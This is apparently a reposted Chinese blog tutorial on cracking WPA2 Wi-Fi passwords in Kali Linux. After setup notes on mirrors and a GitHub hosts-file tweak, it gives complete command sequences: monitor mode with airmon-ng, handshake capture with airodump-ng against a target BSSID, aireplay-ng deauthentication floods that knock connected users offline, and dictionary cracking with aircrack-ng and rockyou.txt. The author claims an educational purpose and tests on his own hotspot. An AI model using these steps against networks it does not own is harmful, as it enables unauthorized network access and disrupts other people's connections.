Kali 下wpa2安全 下的WiFi密码解

Kali 下wpa2安全 下的WiFi密码解

这段时间沉迷与黑客技术无法自拔,当一名炫酷的黑客是每个男孩儿时的梦想,但是这条路也是艰辛的,孤独的,就看你有没有那个恒心一直走下去。现在网络很发达有很多的学习资源,能够很好的帮助我们学习一样东西,也记得以前有位大神说过(哈哈名字就不说了),学it Google,百度 就是最好的老师。闲话不多说了下面笔者分享一下自己进行WiFi渗透的一个实例,既能帮助感兴趣的伙伴学习,也能使笔者后面更好的回顾。
在正式开始之前。我们先要准备相关的环境我这里用的是:
VMware Workstation Pro
kali-linux-2018.2-amd64.iso
重点:!!!! 需要一张无限网卡
首先安装好kali (本文的重点是讲如何进行WiFi密码的破解 所以怎么安装系统就简单介绍 网上也有教程)
到此默认读者已经安装好了kali 有一点了解的同学都知道kali就是一个为渗透而生的Linux的发型版,她自带了300多个渗透工具,为什么叫她呢 因为kali在印度音译为迦梨,(KALI,卡莉女神,卡利女神)是印度教中的一个女神,字面意思是“黑色的” 是印度很神秘的一派,好不扯远了。
安装好kali 那么要首先要进行的便是更新了,系统的更新,包的更新。
在linux里面更新 那么就涉及到一个更新源的问题,kali官方的源因为国内网络的一些原因并不能正常的更新 那我们就需要修改一下她的更新源。
kali 的更新源在路径/etc/apt / sources.list中
我们使用命令:
$vim /etc/apt / sources.list
点我是图片
添加完成后我们按esc键 后 ‘:wq’保存退出
在输入命令
#apt-get update 首先要执行这条命令 它是根据我们的更新源而列出索引供下面这条命令更新最新的包
# apt-get upgrade 更新软件包

国内比较好用的更新源笔者在下面列出来了:

#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

#阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

#清华大学
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free

#浙大
deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free

#东软大学
deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib

#官方源
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib

好在执行完上面两个命令后环境也基本安装好了,噢 还有就是在kaili上下载东西不免很多我们都是在GitHub上下载,或者挂载,那样会有些慢 又不想花钱挂vpn的小伙伴可以参考一下笔者下面的方法,可以很明显的提高下载速度:
额。。。思路就是::git clone 特别慢是因为github.global.ssl.fastly.Net域名被限制了。只要找到这个域名对应的ip地址,然后在hosts文件中加上ip–>域名的映射,刷新DNS缓存就可以了
首先用下面方法查看域名,与IP
例如:http://github.com.ipaddress.com/#ipinfo 查看github.com的IP 与域名
http://github.global.ssl.fastly.net.ipaddress.com/#ipinfo 查看github.global.ssl.fastly.net的IP 与域名
将查找的域名,与IP 附加在路径为/etc/hosts的文件中:
点我是图片
保存并退出
修改完hosts还不会立即生效,你需要刷新DNS缓存,告诉电脑我的hosts文件已经修改了。
输入指令:sudo /etc/init.d/networking restart 即可。

插入无线网卡:
点击虚拟机选卡,选择可移动设备 在里面找到你的网卡设备 ,点击连接就行
买网卡尽量买免驱网卡 因为会省去安装驱动的麻烦

好万事俱备只欠东风了,下面就是本为的重点了:
第一步:
$ iwconfig 查看网络设备

点我是图片
出现黄色框内的内容及说明网卡被正常识别了
第二步:
为了避免后面不出错输入以下命令:
# service network-manager stop
# airmon-ng check kill
第三步:
# airmon-ng start wlan0 将网卡调为混杂模式
# iwconfig 检验是否成功
点我是图片
这样便设置成功
第四步:
# airodump-ng wlan0mon 扫描附近热点
点我是图片
本次笔者以自己手机开的热点作为测试
记住 测试热点的bssid CH 信道数
第五步:
开始进行捕捉握手包:
命令# airodump-ng wlan0mon –bssid 4E:49:E3:64:5C:DF -c 9 -w wpa2
点我是图片
出现红框即表示捕获握手包成功
如果很长时间没有出现的伙伴 在新打开一个终端窗口输入命令

# aireplay-ng -0 0 -a 4E:49:E3:64:5C:DF wlan0mon
洪水攻击冲垮连接热点的用户 强行使他们重新连接而得到握手包

第五步:
# ls wpa*
点我是图片

后面使用Kali Linux中默认存在的字典,进入目录为/usr/share/wordlists/rockyou.txt.zip,其中需要使用命令来解压:
点我是图片

再回到最先握手包的路径 执行命令:
# aircrack-ng -w/usr/share/wordlists/rockyou.txt wpa2-01.cap

点我是图片
这样便以经得出了密码 这个方法也只能破解比较简单的密码,例如纯数字 或者 纯字母 还有就字母与数字组合的密码 有特殊符号的那么破解就比较困难了,但你的字典足够强大那么就可以破解。

好了本文也到此结束了,本为只做教程教学,学习为主,警醒大家网络的安全意识,并不是教你干坏事。
未经作者同意 严禁转载。


发布了27 篇原创文章 · 获赞 62 · 访问量 1万+

猜你喜欢

转载自blog.csdn.net/qq_42359956/article/details/81275127
今日推荐